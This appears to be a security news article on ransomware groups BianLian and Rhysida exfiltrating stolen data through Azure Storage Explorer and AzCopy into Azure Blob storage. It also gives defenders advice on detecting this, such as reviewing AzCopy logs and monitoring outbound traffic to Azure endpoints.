Recent findings by cybersecurity firm modePUSH indicate that ransomware operators, such as BianLian and Rhysida, are taking advantage of Microsoft's Azure Storage Explorer and AzCopy to siphon data from targeted networks into Azure's cloud storage solutions.
BianLian is a ransomware group known for its cyberattacks targeting various organizations, primarily in the healthcare sector. Rhysida is another ransomware group that has been active in recent years. Like BianLian, they typically employ a double extortion tactic, encrypting victims' data and threatening to leak sensitive information if a ransom is not paid.
Technique Overview
Azure Storage Explorer offers a user-friendly graphical interface for administering Azure assets, while AzCopy facilitates command-line operations for transferring substantial data volumes. The two tools have been observed in use by cybercriminals to move purloined data into Azure Blob storage containers, before eventually transferring it to private repositories.
Researchers pointed out that to utilize Azure Storage Explorer, attackers had to install certain dependencies and upgrade to .NET version 8. The preference for Azure among cybercriminal groups stems from its widespread acceptance in enterprise environments, which often results in fewer security barriers during data exfiltration attempts.
Its ability to manage extensive data volumes efficiently is also attractive to attackers aiming to extract significant data quantities swiftly. According to modePUSH analysts, ransomware groups deployed multiple instances of Azure Storage Explorer to accelerate uploads to Azure Blob.
Detection and Defense Strategies
Security teams can enhance detection efforts by examining AzCopy's log files located at %USERPROFILE%\.azcopy. These files record data operations, providing insights into unusual activities.
Effective security practices include monitoring the execution of AzCopy, scrutinizing outbound traffic to Azure Blob endpoints, and keeping an eye on irregular file access on key servers. Organizations should consider enabling the ‘Logout on Exit' feature to mitigate the risk of data theft through session abuse.
Ransomware groups frequently employ specialized exfiltration tools, often including Rclone for synchronization with various cloud providers and MEGAsync for interaction with the MEGA cloud. Despite the diversity of tools used, a commonality exists in their exploitation of trusted enterprise-grade services like Azure.
Given its widespread adoption by corporations, Azure is less likely to face restrictions imposed by corporate firewalls and security measures. Consequently, data transfer attempts via Azure are more likely to bypass detection and proceed unobstructed. Furthermore, Azure's scalability and performance capabilities, enabling the handling of substantial volumes of unstructured data, prove invaluable to attackers seeking to exfiltrate large quantities of files within the shortest feasible timeframe.